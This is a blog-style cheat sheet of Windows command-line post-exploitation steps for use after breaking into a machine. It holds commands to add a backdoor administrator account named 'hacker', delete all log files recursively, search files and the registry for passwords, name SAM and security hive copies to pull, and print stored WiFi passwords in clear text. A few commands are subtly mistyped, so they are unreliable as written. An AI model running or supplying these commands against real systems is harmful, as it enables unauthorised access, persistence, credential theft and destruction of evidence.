The Complete List of Windows Post-Exploitation Commands (No Powershell)
  • I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and organise this better and add my smart recon scripts. ❤

Current User

whoami /all

On older machines, whoami might not be available so to find out the current user try the following:

echo %username%

All Users

net user

Add User

net user hacker hack3d /add

Make User Admin

net localgroup administrators hacker/add

Remove User

net user hacker /del


type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts

Files to Pull

%WINDIR%\repair\software, %WINDIR%\repair\security

Host Information

fsutil fsinfo drives
net time
net file
net session
net use

If you are looking for kernal exploit targets, you can try using findstr like so…

driverquery | findstr Kernel


sc queryex type= service state= all
netstat -ano

Query a specific service:

sc query <SERVICE NAME>

Start a service:

sc start <SERVICE NAME>

Stop a service:

sc stop <SERVICE NAME>

Kill a Task

taskkill f /pid 1337

List System Logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords


netsh wlan show profile

Get Cleartext Pass

netsh wlan show profile <SSID> key=clear